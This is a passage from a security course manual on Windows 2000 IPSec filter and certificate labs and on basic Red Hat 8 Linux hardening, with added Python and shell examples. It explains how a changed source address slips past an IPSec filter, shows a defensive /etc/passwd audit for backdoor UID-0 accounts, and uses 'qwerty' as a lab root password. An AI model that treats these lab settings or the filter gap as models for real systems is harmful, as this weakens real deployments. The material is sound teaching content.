When you edited the filter, Student_Q’s policy matched packets against the source and destination addresses in the IP header and applied IPSec only to traffic with the specified machine. Because Student_P’s IP address was changed, its packets no longer matched the filter, no IPSec rule applied to them, and the connection was allowed to take place unprotected. A filter list is a matching rule, not an authentication check: it trusts whatever address the sender puts in the header, and Windows 2000 passes traffic that matches no filter in the assigned policy through without IPSec.

33. Ping your nearest router.

Are you able to ping the router? Why or why not?

You are able to ping the router for the same reason that Student_P could communicate with Student_Q: the router’s address does not match the filter, so the traffic is neither protected nor blocked.

What this means is that if traffic between sensitive machines needs to be protected, you can modify the filter lists to do so. All other traffic to those same machines from other hosts will not be protected. If that unmatched traffic should not be allowed at all, the policy needs a second, less specific rule (for example, All IP Traffic with the Block action) to catch it; the most specific matching filter is the one that is applied. It is up to you as the IPSec policy designer to come up with these schemes for your company.
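The following is an added example, not part of the course, that models how an assigned Windows 2000 IPSec policy selects a filter for a packet and why the address change in this task bypassed protection. The lab addresses, the filter names and the specificity ranking (longer address prefixes win, a named protocol beats "any") are assumptions; the ranking simplifies Windows’ real filter weighting but reproduces what the capture shows, and the catch_all option shows the Block rule described above.

```python
# Added example: a small model of how an assigned Windows 2000 IPSec policy picks
# the filter for a packet. Windows applies the action of the most specific
# matching filter, and a packet that matches no filter is passed through without
# IPSec. The specificity ranking below (longer address prefixes win, a named
# protocol beats "any") is an assumption that simplifies Windows' real filter
# weighting but reproduces what the task shows.
import ipaddress


class Filter:
    def __init__(self, name, src, dst, proto="any", mirrored=True):
        self.name = name
        self.src = ipaddress.ip_network(src, strict=False)
        self.dst = ipaddress.ip_network(dst, strict=False)
        self.proto = proto          # "any", "tcp", "udp", "icmp"
        self.mirrored = mirrored    # also match packets in the reply direction

    @staticmethod
    def _addresses_match(src_net, dst_net, pkt):
        return (ipaddress.ip_address(pkt["src"]) in src_net
                and ipaddress.ip_address(pkt["dst"]) in dst_net)

    def matches(self, pkt):
        if self.proto != "any" and self.proto != pkt["proto"]:
            return False
        if self._addresses_match(self.src, self.dst, pkt):
            return True
        return self.mirrored and self._addresses_match(self.dst, self.src, pkt)

    def specificity(self):
        # /32 on both ends outranks a subnet, which outranks any address.
        return self.src.prefixlen + self.dst.prefixlen + (1 if self.proto != "any" else 0)


def decide(policy, pkt):
    """policy: list of (Filter, action); action is 'negotiate', 'permit' or 'block'.
    Returns (name of the filter applied, action). Unmatched traffic is permitted
    in the clear, which is the behaviour the task demonstrates."""
    hits = [(f, action) for f, action in policy if f.matches(pkt)]
    if not hits:
        return None, "permit"
    best, action = max(hits, key=lambda hit: hit[0].specificity())
    return best.name, action


# Constructed lab addresses (assumed; the course uses 172.26.10.x / 172.28.10.x).
STUDENT_Q = "172.26.10.2"
STUDENT_P = "172.26.10.1"
ROUTER = "172.26.10.254"


def lab_policy(catch_all=False):
    """Task 2E-9's edited filter: My IP Address -> Student_P, mirrored.
    With catch_all=True a second, less specific rule blocks everything else."""
    policy = [(Filter("to Student_P", STUDENT_Q + "/32", STUDENT_P + "/32"), "negotiate")]
    if catch_all:
        policy.append((Filter("everything else", "0.0.0.0/0", "0.0.0.0/0"), "block"))
    return policy


def inbound_to_q(src, proto="tcp"):
    """A packet arriving at Student_Q from src."""
    return {"src": src, "dst": STUDENT_Q, "proto": proto}


def outbound_from_q(dst, proto="icmp"):
    """A packet Student_Q sends to dst (the ping in step 33)."""
    return {"src": STUDENT_Q, "dst": dst, "proto": proto}
```

With only the edited filter, a packet from 172.26.10.101 and the ping to the router both fall through to "permit"; with the catch-all Block rule they are dropped, while traffic with Student_P’s real address still negotiates IPSec because its filter is more specific.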


34. Close Network Monitor and any other open windows.

35. Disable the Classroom Hub interface. The Partner interface should still be enabled.

Using Certificates

Without going into the details of setting up a CA or obtaining IPSec certificates from a CA, we will see how easy it is to use a certificate for IPSec once you have it. A certificate binds a public key to the attributes (such as the subject name and intended key usage) that IKE uses to authenticate a peer; the matching private key stays in the machine’s key store and never leaves it. We have created a certificate that you can use for this purpose. Importing it into Trusted Root Certification Authorities tells the machine to trust certificates issued by that CA; for IKE to authenticate with certificates, each peer also needs its own machine certificate issued by that CA.

TASK 2E-10
Using Certificates for Authentication

Note: Perform step 1 through step 12 on all student computers.

1. In your ipsec.mmc.msc console, choose Console→Add/Remove Snap-in.

2. Click Add.

3. Click Certificates, and click Add.

4. Select the radio button for Computer Account, and click Next.

5. Click Finish, click Close, and then click OK.

6. Expand Certificates (Local Computer).

7. Expand Trusted Root Certification Authorities.

8. Right-click Certificates, and choose All Tasks→Import. The Certificate Import Wizard is displayed.

9. Click Next.

10. Click Browse and browse to the IPSec certificate on your course CD-ROM, in the \085545\Data\Certificates folder. You might have to click the Files Of Type drop-down list and select X.509 or *.cer to see the certificate.

11. Select newroot.cer and click Open.

12. Click Next twice, and then click Finish. Click OK.

Note: Perform step 13 through step 22 only if you are designated as Student_Q.

13. Click IP Security Policies On Local Machine.

14. Double-click 7_REQUIRE_AH(sha)+ESP(sha+3des).

Installing CAs and certificates was covered in detail in the prerequisite courses.


15. Select All IP Traffic and click Edit.

16. On the IP Filter List tab, select All IP Traffic, and click Edit. Edit the filter to return the Destination Address to Any IP Address. Click OK, and then click Close.

17. Click the Authentication Methods tab.

18. Click Edit.

19. Select the radio button for Use A Certificate From This CA, and click Browse.

20. Scroll down the list and select SCPR01. Feel free to view and explore the certificate if you like. Click OK.

21. Click OK, and then click Close twice.

22. Verify that the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy is assigned, and close the console.

Note: Perform step 23 through step 37 only if you are designated as Student_P.

23. Click IP Security Policies On Local Machine.

24. Double-click 7_RESPOND_AH(sha)+ESP(sha+3des).

25. Click Edit.

26. Click the Authentication Methods tab.

27. Click Edit.

28. Select the radio button for Use A Certificate From This CA, and click Browse.

29. Scroll down the list and select SCPR01. Feel free to view and explore the certificate if you like. Click OK.

30. Click OK twice, and then click Close.

31. Verify that the 7_RESPOND_AH(sha)+ESP(sha+3des) policy is assigned, and close the console without saving the settings.

32. From the Start menu, choose Settings→Network And Dial-up Connections.

33. Right-click the Partner interface, and choose Properties.

34. Double-click Internet Protocol (TCP/IP).

35. Edit the IP address by subtracting 100 from the last octet. That is, if the IP address is 172.26.10.101, go back to your originally assigned IP address for that interface and make it 172.26.10.1.

36. Click OK twice.


37. Open a command prompt and enter ipconfig to verify the change in your IP address.

Note: Perform the next step only if you are designated as Student_Q.

38. Activate Network Monitor, and start a capture.

Note: Perform step 39 through step 42 only if you are designated as Student_P.

39. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q. If the ftp attempt does not work, skip the next three steps.

40. Log on as anonymous with no password.

41. Enter dir to see a list of files hosted on the ftp site.

42. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

43. In Network Monitor, stop and view the capture.

44. Verify that ISAKMP negotiations took place, and then close Network Monitor.

Disabling IPSec

Now that you have examined and implemented various forms of IPSec, you need to turn IPSec off to ensure that the remainder of the tasks throughout the course will run smoothly, with no issues.

TASK 2E-11
Removing IPSec

Note: Perform this task on all student machines.

1. Open the ipsec.mmc.msc console.

2. Verify that all IPSec policies are listed as Unassigned. If a policy is still assigned, unassign it now.

3. Close the console, saving changes if you like.

4. In the Network And Dial-up Connections Control Panel, right-click the Classroom Hub interface, and choose Enable.

5. Right-click the Partner interface, and choose Disable.


6. Ping an IP address elsewhere in the classroom to be sure you have the proper connectivity.

7. Close all open windows.

Summary

In this lesson, you worked with a Microsoft Management Console (MMC). You configured an MMC and viewed the default or built-in IPSec policies. You then created custom IPSec policies. You implemented and tested these policies. You also took a first look at implementing filter lists and experimented with a couple of authentication methods: preshared keys and certificates.

Lesson Review

2A What are the two protocols in IPSec that are used to protect network traffic?

The Encapsulating Security Payload (ESP) and the Authentication Header (AH).

What are the two main modes of implementation for IPSec?

Transport Mode and Tunnel Mode.

If you are going to set up a VPN with IPSec, what mode will you probably use?

Tunnel Mode.

2B What are the three default IPSec policies in Windows 2000?

Server (Require Security), Server (Request Security), and Client (Respond Only).

What integrity algorithms are supported in Windows 2000 IPSec?

MD5 and SHA-1.

What encryption algorithms are supported in Windows 2000 IPSec?

DES and 3DES.

2C What authentication methods are supported in the Windows 2000 implementation of IPSec?

Kerberos, Certificates, and Preshared Keys.

What are the default key lifetimes?

By default, a new session key is generated after every 100,000 KB (roughly 100 MB) of data exchanged between the two IPSec devices or every 3600 seconds (1 hour), whichever comes first.

Verify that all students have completed this task before you proceed, or the remaining tasks might not work as expected.


2D What protocol and port are used by ISAKMP during the negotiation process?

UDP and Port 500.

In Transport Mode, AH ensures the integrity of the entire IP datagram (the payload and the IP header, except for header fields that change in transit, such as the TTL and header checksum), while ESP can be used to ensure the confidentiality and integrity of the payload (or data) only.

2E When would ESP’s integrity check be most usefully employed?

When implementing IPSec in Tunnel Mode. ESP’s integrity check at the tunnel endpoint will ensure the integrity of the payload (including the encapsulated packet, internal IP headers, and all other data).

Using filters, it is possible to explicitly control IPSec traffic.


Lesson 3: Hardening Linux Computers

Overview

In this lesson, you will be introduced to the core operation of Linux, specifically Red Hat Linux version 8.0. You will examine the process of securing files and directories, and securing user accounts and passwords. You will secure services and network connections, and disable unneeded services. The lesson will end with the implementation of SSH for secure communication and the use of Bastille to harden the system as a whole.

Objectives

In this lesson, you will:

3A Perform fundamental Linux administration.

You will navigate in Linux to create users, groups, files, and directories. You will modify their properties, and identify system information.

3B Configure fundamental Linux security.

You will create file and directory permissions, secure user passwords, and implement Pluggable Authentication Modules (PAMs).

3C Secure access to Linux services.

You will secure access to services by configuring and implementing TCP wrappers and xinetd.

3D Configure network services.

You will use the Network File System and Samba as network services, and examine methods of securing these services.

3E Harden Linux.

You will secure the system startup and shutdown processes, examine Linux logging, implement Tripwire, and lock the machine with Bastille.

Data Files
none

Lesson Time
8 hours


Topic 3A
Introduction to Linux Administration

No discussion of Linux would be complete without a mention of open-source software. Open-source software means more than that the source code of the application is available. The Open Source Initiative (www.opensource.org/) defines open source by 10 criteria that a license must meet, covering distribution, licensing, source code, and redistribution. The following list, from the Open Source Initiative, describes the general open-source criteria.

1. Free redistribution: The license on the software must not restrict anyone from selling or giving away the software. The license must not require a fee or royalty for distribution.

2. Source code: The software must include the source code, or allow it to be obtained, along with the compiled software. The code must be in the form that a programmer would prefer to use to modify the program.

3. Derived works: The license must allow modifications and derived works, and must allow them to be distributed under the same terms as the license of the original software.

4. Integrity of the author’s source code: The license may restrict the distribution of modified source code only if it allows the distribution of patch files with the source code, for the purpose of modifying the software at build time. The license may require derived works to carry a different name or version number from the original software.

5. No discrimination against persons or groups: The license must not discriminate against any person or group of persons.

6. No discrimination against fields of endeavor: The license must not restrict use of the software in any field of endeavor.

7. Distribution of license: The rights attached to the software must apply to everyone to whom the software is redistributed, without the need for them to execute an additional license.

8. License must not be specific to a product: The rights attached to the software must not depend on the software being part of a specific software distribution.

9. License must not restrict other software: The license must not place restrictions on other software that is distributed along with the licensed software.

10. License must be technology-neutral: No provision of the license may be predicated on any individual technology or style of interface.

Open-source Criteria


Linux

Linux is an operating system (OS) similar to UNIX, originally created by Linus Torvalds, with programming help from around the world. Linux is developed under the GNU General Public License (GPL). The GPL is a full legal document that addresses the points raised under the general guidelines of the Open Source Initiative. The GNU document can be found at www.linux.org/info/gnu.html.

Linux itself can be found in many variations today. Although the source code is available to be downloaded and used at will, there are many packages of Linux that are not distributed for free. These organizations are able to charge money for their distribution of Linux, provided that the source code is always released and available. Some of the Linux distribution packages include Red Hat, SuSE, Caldera, and MandrakeSoft.

The Kernel

Linux was developed to run on personal computers, but it runs on many platforms other than the PC. Linux has been ported, or modified, to run on the PowerPC, Macintosh, DEC Alpha, Sun SPARC, and other platforms. Linux has POSIX compatibility in order to interoperate with other UNIX-like computers.

When a Linux system boots, it loads and runs the core operating system program, which is called the kernel. The kernel then runs the other applications on the computer. The kernel is always under development, and is always available in both a stable release and a testing release.

A major benefit of the design of Linux is that the kernel is modular. This means that individual components of the kernel (device drivers, file systems, and so on) can be built as loadable modules that are added, removed, and updated without rebuilding the whole kernel. For hardening, note the flip side: loading a module requires root, and module code runs with full kernel privilege, so a compromised root account can alter the running kernel itself.

The Graphical Interfaces

Most people who work with Linux are comfortable with using the command-line interface to work with the operating system. However, as Linux continues to gain mainstream use, the inclusion of graphical interfaces has become an additional feature that users enjoy.

There are many different graphical interfaces in Linux. These are often referred to loosely as window managers, although the popular ones, the K Desktop Environment (KDE) and the GNU Network Object Model Environment (GNOME), are full desktop environments that each include a window manager. They provide users with point-and-click and drag-and-drop functionality and create user-friendly environments.

Basic Navigation in Linux

In order to use Linux, and to follow the tasks in this lesson, you will need to become familiar with some of the fundamental terms and phrases. These common terms are quickly defined as follows, and will be discussed in more detail where they come into the text of the lesson.

Term: Definition

Shell prompt (Terminal Window): A command-line interface that functions as a go-between between the user and the operating system.

In this lesson, the Linux distribution used is Red Hat 8.0.


Command line: The actual location in the shell prompt where a user will enter commands to the operating system.

Panel: A toolbar, often found across the bottom of the screen, which contains buttons and shortcuts to often-used applications.

Root: A user account created during the installation of the operating system. Root has complete access to the system. There are applications that must be run using the root account. The root account has similarities to the Administrator account in Windows or the Supervisor account in Novell. As root has complete control over the system, care must be taken that the account is properly secured. This account is sometimes referred to as the superuser account.

su: The su (substitute user) command enables a user to switch to another user account, such as the root account, without initially logging in as root. This allows for the running of applications that require root access from a shell prompt, while logged in as a non-root user.

Man page: The abbreviated way of saying manual page. The man pages are the information about a command. For example, to learn about the function and/or use of the su command, invoking the command man su at the command line shows the information about the su command. To close a man page, press the Q key.

X or X Window System: The GUI environment in Linux. When using X you are simply using the GUI instead of the pure command-line function of a console.

Logging In

Logging in to Linux requires authentication, just as in any other modern operating system. When first using the system, you are required to log in as root. Once you are in the system, you should create user accounts as needed for the users of the system, and then do routine work from an unprivileged account, switching to root with su only when a task requires it. User account names are case-sensitive, so ROOT and root are two different accounts. The default root account is all lower-case. A password is created for the root account during the installation of the operating system.

During the installation, Red Hat provides the option of logging in to either the text mode or the graphical mode of operation. If the system is configured to use text mode, after you enter your credentials, you will remain in the text mode of operation. To switch into the graphical user interface, you can enter the startx command, provided that X has been properly configured on the machine.

The GUI

As mentioned earlier, there are several different desktop environments, such as KDE and GNOME. For this lesson, the GNOME GUI is the one that will be used. An example of a freshly installed GNOME desktop is shown in Figure 3-1.


Figure 3-1: The GNOME desktop on a new install of Red Hat Linux.

The primary components of the GNOME desktop are panels, menus, windows, workspaces, the Nautilus File Manager, the Desktop Background, and the Main Menu (sometimes called the Start Here location).

• There can be several panels on the desktop, although the starting configuration of GNOME is to have one panel (called the menu panel) across the bottom.

• Menus can provide access to nearly all the files and functions of the system. Menus can be accessed from the menu panel by clicking the Main Menu.

• The Main Menu is where you can access applications, make system configuration changes, find files, and more. In the Red Hat 8 distribution, the Red Hat icon, with the small triangle, is the Main Menu. In other installs of GNOME, the Main Menu is a footprint icon.

• The Nautilus File Manager is the access point to files and directories in the GUI. You can display the contents of a file within a Nautilus window, or you can open the file with a different application from Nautilus.

• The Desktop Background component is located behind all the other components on the desktop, and is an active part of the user interface. Objects can be placed on the Desktop Background for quick access, and by right-clicking anywhere on an open portion of the Desktop Background, you can open a menu to open different programs, such as a Terminal.

• Workspaces provide the user the ability to have separate working desktops. You can open several windows in one workspace, for example, and then use the Workspace Switcher to switch to another workspace with no open windows. Figure 3-2 highlights these features of GNOME, showing two open workspaces.


Figure 3-2: Desktop components highlighted on a Red Hat Linux system.

Terminal Window

Although much of the administration of the Linux computer can be done by using a GUI, there are many people who will use the Terminal Window for much, if not all, of their administration. Similar in nature to the DOS (or command) prompt on a Windows machine, the Terminal Window is where you can enter commands to be executed by the computer.


Figure 3-3: A blank Terminal Window opened in Red Hat 8.

Common Commands

Because many of the tasks in this lesson will be performed in the Terminal Window, it is important for you to become familiar with the Terminal Window and some frequently used commands. Recall that in Linux, file names, directory names, and commands are case-sensitive. When you are logged into the Linux machine, you will see the following prompt: [root@rh /]#. This is an indicator of the user account logged in (in this case, root) and the computer name (in this case, rh), along with the current directory (in this case, /). The following table lists only a small grouping of the many commands in Linux, but you should become comfortable with all of them, including their functions.

Linux Notation or Command: Description

/: Root directory.

./: Current directory.

../: Parent directory.

cat: The concatenate command writes the contents of one or more files to the terminal. Common use: cat <filename>

cd: The change directory command changes the current directory. Common use: cd <directory_name>

cp: The copy files command copies a file to a specified destination. Common use: cp <source_filename> <destination_filename>

echo $PATH: The echo $PATH command lets you see your current path, or the directories in which the system will search for executables.

export: The export command marks a shell variable for passing to the environment of programs the shell starts; run with no arguments, it lists the variables currently exported.

history: The history command shows the command history of the terminal session, up to the shell’s HISTSIZE limit (500 commands unless the system profile raises it). You can see a shorter list, though; for example: history 10

ifconfig: The ifconfig command shows your current TCP/IP configuration.

Common Linux Commands (2 slides)

If students are interested and time permits, lead a short discussion that focuses on comparing these Linux commands to their Windows and DOS counterparts.


kill: The kill command sends a signal (by default SIGTERM, a request to exit) to a running process. Common use: kill <PID>, where PID is the Process ID. kill -9 <PID> sends SIGKILL, which the process cannot catch or ignore.

ls: The list command shows the contents of a directory. Common use: ls <directory_name>

ls -al: Using the -al options with the list command shows the contents of a directory, including hidden files (those whose names begin with a dot), in long format.

ls -l: Using the -l option with the list command shows the contents of a directory in long format.

man: The manual command opens manual pages (the file documentation) for a specified command. Common use: man su

mkdir: The make directory command creates a new directory. Common use: mkdir <directory_name>

mv: The move command moves or renames files and/or directories. Common use: mv <current_filename> <new_filename>

passwd: The password command changes your password.

ps: The process status command lists the running processes and their Process IDs.

pwd: The print working directory command lists the full path of your current working directory. It does not list the contents of the directory.

rm: The remove command deletes a specified file. Common use: rm <filename>

rm -r: Using the -r option with the remove command deletes a directory and all of its contents. Common use: rm -r <directory_name>

rmdir: The remove directory command deletes an empty directory. Common use: rmdir <directory_name>

shutdown: The shutdown command shuts down the system. Common use: shutdown -h now (halt) or shutdown -r now (reboot).

touch: The touch command creates an empty file if it does not exist, or updates the timestamps of an existing file. Common use: touch <filename>

In addition to the commands listed, you might want to use the keyboard shortcuts that are available. Some of the common shortcuts are listed in the following table.

Key Combination: Effect

Ctrl+Alt+Backspace: Kill X. Kills the current X session, and returns to the login screen (used if the normal exit does not work). This key combination works only in the GUI.

Ctrl+Alt+Delete: Shut down and reboot the system. Shuts down the current session, and reboots the OS (used if the normal shutdown does not work).

Ctrl+D: Log out of a terminal or console session (used instead of entering exit or logout).

Ctrl+Alt+Fx: Switch screens. Ctrl+Alt and any function key from F1 through F7 displays a new screen. F1 to F6 are text screens, while F7 is the GUI.

Up Arrow: Scroll through command history in the Terminal Window.


The following task is designed to walk you through the basic process of using Linux, creating directories and files. You will then copy, move, and delete files. If at any time you would like to see the options for a command, use the --help switch after the main command; for instance, chmod --help. You can also use the man pages to find out more details about any command.

TASK 3A-1
Navigating in Linux

1. Reboot and log on to Red Hat 8 as root, with the password qwerty.

2. If the GUI does not start automatically, enter startx at the command prompt.

3. Right-click anywhere in the Desktop Background, and choose New Terminal.

4. In the Terminal Window, enter cd / to navigate to the top of the directory structure.

5. Enter mkdir lab1 to create a new directory.

6. Create another new directory named lab2 by using the mkdir command.

7. Enter cd /lab1 to change to the lab1 directory.

8. Enter touch file1 to create a file.

9. Enter ls -l to view the detailed contents of the lab1 folder.

10. Enter cp /lab1/file1 /lab2/file2 to copy the file from one directory to the other.

11. Enter ls to verify that file1 is still in the lab1 directory.

12. Change to the lab2 directory by using the cd command.

13. View the contents of the directory by using the ls command.

14. Change back to the lab1 directory.

15. Enter mv /lab1/file1 /lab2 to move the file from one directory to the other.

16. View the contents of the directory.

17. Change to the lab2 directory, and verify that it contains both files.

18. Enter rm file2 to delete (remove) a file. When you are prompted to confirm the removal, enter y.

19. View the contents of the directory.


User and Group Accounts

As with any other modern OS, the person managing the system will need to create user and group accounts for the individuals that require access to the resources of the system. Linux is no different in this regard. User accounts and group accounts are required, and there are several methods that you can use in their creation.

User accounts might be used by individual people accessing the system, or they might be used by system processes (service accounts). Regardless of whether the user account is for a person or a system process, it will be assigned a User ID (UID) and a Group ID (GID).

Groups are logical groupings of users that have similar requirements, such as the need for similar file permission assignments. Upon creation, each user account will have a primary group associated with it. When a user account is created with the Red Hat defaults, a group of the same name is created, and the user account is the sole member of that group.

In Linux, you can see the current user list by looking at the /etc/passwd file. As we continue farther into this lesson, this file might change, so at this time, you are looking at a default /etc/passwd file. Figure 3-4 shows an example of this file.

Figure 3-4: The default /etc/passwd file on a Linux computer.


In the /etc/passwd file, there are several fields, separated (or delimited) by a colon. These fields describe the individual user account. The following list explains each of these fields:

• User Account Name: This is the login name for the user account.

• Password: This is the login password for this user account. If the only thing in this field is an x, then the password hash is kept in a shadow password file, /etc/shadow, which is readable only by root. (Shadow passwords are discussed later in this lesson.) An empty field means the account has no password at all, which is a finding on any audit.

• User ID: This is a numerical identifier assigned to each user account upon creation. This is usually referred to as the UID. The kernel makes its access decisions on the UID, not the name: any account with UID 0 is root, whatever it is called.

• Group ID: This is the numerical identifier of the primary group to which the user belongs. This is usually referred to as the GID.

• Full Name: This might be the full first and last name of the user (the comment, or GECOS, field).

• Home Directory: This is the default current directory at login time for this user account.

• Shell: This is the command interpreter that loads when the user logs in at the Terminal interface. If the user logs in to the GUI, this is the shell that loads in a Terminal window. A shell of /sbin/nologin (or /bin/false) prevents interactive login and is the normal setting for service accounts.

In Linux, user and group accounts are assigned easy-to-remember and easy-to-manage names for the benefit of users and administrators. To the computer, the significant values are not the human-readable names but the numeric identifiers. When a new user is created, it is assigned the first available UID and GID, starting at 500 on Red Hat 8 (the lower numbers are reserved for system accounts; most current distributions start ordinary users at 1000 instead). The UID and GID numbers increase by one for each new user account created.
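As an added example (not part of the course text), the following shell script applies those field definitions to a constructed /etc/passwd-style file and reports the three things a hardening review checks first: a second UID 0 account, an empty password field, and a system account that still has an interactive shell. The sample lines, the account names in them, and the threshold argument (500 for Red Hat 8, 1000 for current distributions) are assumptions made for the example; run audit_passwd /etc/passwd 500 on a Red Hat 8 host to check a real file.

```sh
#!/bin/sh
# Added example (not part of the course): audit a file in /etc/passwd
# format for the conditions a hardening review looks for first.
#   UID0     another account besides root with UID 0 (a second superuser)
#   NOPASS   empty password field (no shadow entry, no password at all)
#   SYSSHELL a system account (UID below the first ordinary UID, which is
#            500 on Red Hat 8 and 1000 on most current distributions)
#            that still has an interactive shell
# Usage: audit_passwd <file> [first_ordinary_uid]   (prints CODE:user lines)
audit_passwd() {
    awk -F: -v first_uid="${2:-500}" '
        NF < 7 { next }                            # skip malformed lines
        $3 == 0 && $1 != "root" { print "UID0:" $1 }
        $2 == ""                { print "NOPASS:" $1 }
        $3 != 0 && $3 < first_uid + 0 &&
            $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print "SYSSHELL:" $1 }
    ' "$1"
}

# Number of findings; a clean file yields 0.
count_findings() {
    audit_passwd "$1" "${2:-500}" | wc -l | tr -d ' '
}

# Constructed sample in /etc/passwd format; not taken from any real system.
SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
svc_backup:x:48:48:backup service:/var/backup:/bin/bash
toor:x:0:0:second superuser:/root:/bin/bash
guest::505:505:Guest:/home/guest:/bin/bash
User1:x:507:100::/home/User1:/bin/bash
EOF

audit_passwd "$SAMPLE_PASSWD"   # SYSSHELL:svc_backup, UID0:toor, NOPASS:guest
```

Raising the threshold to 1000 (the second argument) also reports guest and User1 under SYSSHELL, which is the right answer on a distribution whose system accounts run up to 999 and the wrong one on Red Hat 8; the threshold has to match the system being audited.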

Standard Users and Groups

In the Red Hat distribution of Linux, several default user accounts, called standard users, are created during the installation of the OS. These accounts have default UID, GID, home-directory, and shell values. Figure 3-5 shows several of these standard users.

Figure 3-5: Several of the standard user accounts on a Red Hat Linux machine.


The standard accounts can be found in the /etc/passwd file, just as any other account. These are examples of system accounts, as opposed to the user accounts created for individual access. In addition to the standard user accounts, several standard groups are also created upon installation. These groups can be found in the /etc/group file. Figure 3-6 shows several of the standard groups.

Figure 3-6: Several of the standard groups on a Red Hat Linux machine.

Adding Users and Groups

You can add users and groups to Red Hat Linux from within a Terminal session or from within the GUI. The basic command for adding a user is useradd, followed by any options (such as -g to name the primary group), then the account name. The new account is locked until you assign a password, or configure the account so that the user must set a password during the first login. Group names are case-sensitive; the group Red Hat creates for ordinary users is named users, in lowercase. So, in the following command sequence, a user account called Linux1 is added with the group Users as its primary group, and then given a password of qwerty (passwd does not echo what you type; the password is shown here only for illustration, and qwerty is not a password to use outside the classroom):

useradd -g Users Linux1
passwd Linux1
New password: qwerty
Retype new password: qwerty

This simple syntax can be used to add a user quickly to the system. Several switches can be used during the creation of the account. Two of note, at this time, are the -d and the -s switches.

• The -d switch enables you to specify a home directory. If no directory is specified, the user will be assigned a default home directory in the form of /home/useraccountname; for instance, for a user called jkmack, the default home directory would be /home/jkmack.

• The -s switch enables you to assign a shell to this user. If no shell is specified, the user will be assigned the default shell of /bin/bash. For an account that exists only to own files or to run a service, assign /sbin/nologin here so that nobody can log in with it.


If you want to add a group to the system by using the command-line syntax, use the groupadd command. With this command, you create the group and the GID at the same time. The switch for defining the GID is -g. If you do not define a GID during the creation of the group, the system will assign the next available number to the group. So, the following command creates a group called SCNP_Admins, with a GID of 1024:

groupadd -g 1024 SCNP_Admins

Although the command-line method for adding user and group accounts is useful, many administrators are becoming more comfortable with the GUI tools that are available. In Red Hat, the GUI tool for adding and working with user and group accounts is called User Manager. To run User Manager, click the Main Menu, then choose System Settings→Users And Groups.

Figure 3-7: Red Hat Linux User Manager, showing user accounts.

In User Manager, you can see all the user accounts in the system, along with their configurations. If you want to see all the system accounts as well, choose Preferences, and clear the option to filter system users and groups. Selecting the Groups tab enables you to see the group accounts on the system.

Adding a new user in User Manager is a straightforward process. Once you click the Add User button, simply fill in the fields, and click OK. If you want to change the properties of a user account, select the user account, then choose File→Properties. There are four tabs to manage for the user account. They are described in the following list:

• User Data—This tab is where the primary data is located, such as user name, full name, password, and home directory.

• Account Data—This tab provides the option to set the account as locked out or to create an expiration date for the account.

• Password Info—This tab shows when the password was last changed, and can be used to set a limit, in days, before a password change is required.

• Groups—This tab lists the groups that the user belongs to, along with the user's primary group.


Adding a new group in User Manager is similar to adding a user account. Once you click the Add Group button, define the group name and, if desired, the GID; otherwise, the system will assign the next available number for the GID. Once the group is created, you can add users to the group by selecting the group and choosing File→Properties.

Figure 3-8: Red Hat User Manager, showing group accounts.

TASK 3A-2
Creating and Modifying Users and Groups

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Enter useradd -g users User1 to create a user account with the name User1. Enter passwd User1 to unlock the account and prepare to assign the password. When you are prompted to enter and retype the new password, enter 1resU.

2. From the Main Menu, choose System Settings→Users And Groups to open User Manager.

3. Verify the existence of the new user account. Check the UID assigned.

4. Switch to the Terminal Window, and enter usermod -u 507 User1 to change the UID to number 507. (usermod changes the ownership of the files in the user's home directory to the new UID; any files the user owns elsewhere keep the old number and must be changed by hand.)

5. Return to User Manager, click Refresh, and verify that the UID has changed.

6. Switch to the Terminal Window, and enter groupadd -g 510 Testers to create a group called Testers, with a GID of 510.


7. Switch to User Manager, select the Groups tab, and verify that the Testers group is displayed and that the GID is 510. You might need to click the Refresh button to see the change.

8. Switch to the Terminal Window, and enter groupmod -g 515 Testers to change the GID.

9. Switch to User Manager and verify that the GID has changed for theTesters group.

10. Select the Testers group, click the Properties button, and select the Group Users tab.

11. Check User1, then click OK to add the User1 user account to the Testers group.

12. Close User Manager. You will use the Terminal Window in the next task.

Switching User Accounts

The root account must be secured, as it is the one account that has the ability to take complete control of the computer. Any intruder that gains root access has essentially taken control of the computer away from you. For this reason, the root account must be protected at the highest level. You should only work as root when absolutely required, such as to modify system files or to manage services on the computer.

There are, however, tasks that require root-level access. So, if you need to run such a task while administering the machine and the network, what are you to do, if you shouldn't log in as root? The answer is to use the Substitute User command for that specific moment.

The Substitute User (su) command runs a shell as a different UID and GID than the user you are currently logged on as. The command is simply su <username>. So, if you want to become root, use the command su root (su with no user name also defaults to root). You will need to provide the correct password for the root account to gain access; the command alone does not grant access. Two practical points: su - (with a dash) starts a login shell, so you get root's own environment and PATH rather than carrying the calling user's environment into the root shell, and each su session is logged through syslog (/var/log/secure on Red Hat), which gives you a record of who became root and when. Exit the root shell as soon as the task is done.

Linux File System

Linux, just as any other operating system, has a method for organizing the information held in files and directories. In Linux, the file system is viewed differently than in Windows. The Linux file system is a combination of all partitions, directories, storage devices, and files. Storage media are not outside components of the file system; they are added as an integral part of the file system, and removed when no longer required.

This is considered a unified file system, where parts of the file system can reside on different, and unique, physical media. Figure 3-9 shows the unified file system of a Linux computer.


Figure 3-9: The unified file system of a Linux computer.

One thing you may notice right away is that there are no drive letters in the file system. The drive letters that are assigned to partitions in Windows do not exist here, so there is no C drive, D drive, and so on. In Linux, for a partition to be used by the system, the system must be told of the existence of the partition (by mounting it, as described below), but files are not accessed based on the physical structure of the drive. All files are accessed in the logical, unified file system.

Another difference that Windows users will notice is that there is no concept of the 8.3 file naming convention that many are used to. Linux file names can be up to 255 characters long on the standard file systems, and they are case-sensitive. Therefore, these three words represent three different files: FILE, File, file. It is also not uncommon for Linux files to have what appear to be multiple extensions. A common example of this would be scp_file.tar.gz. Extensions carry no meaning to the system; whether a file can be run is decided by its execute permission, not by its name.

Disks and Partitions

Now that you have been introduced to the concept of the logical unified file system, you need to examine the structure of physical disks, and how Linux views partitions. Hard disk drives and floppy disk drives have predefined device names in Linux. The following table shows the Linux location and description of the predefined devices.

Location   Description
